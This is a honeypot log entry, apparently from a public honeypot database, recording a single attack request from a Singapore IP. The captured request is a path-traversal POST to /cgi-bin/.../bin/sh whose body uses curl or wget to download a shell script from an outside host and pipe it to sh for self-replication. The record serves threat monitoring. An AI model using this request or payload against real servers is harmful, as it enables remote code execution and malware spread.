Time | 2024/06/02, 16:41:54 (GMT) |
Transaction ID | XLR4BD5M4YG96P25 |
Service | https |
Location | SG (Singapore) |
Attacker | 124.156.207.68 |
Classification | Web post experiment |
Harm Potential | Not |
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 Accept: */* Connection: keep-alive Host: 46.4.222.114:443 Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Length: 109 Content-Type: text/plain X=$(curl http://93.123.39.27/jVA.sh || wget http://93.123.39.27/jVA.sh -O-); echo "$X" | sh -s apache.selfrep
All details are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |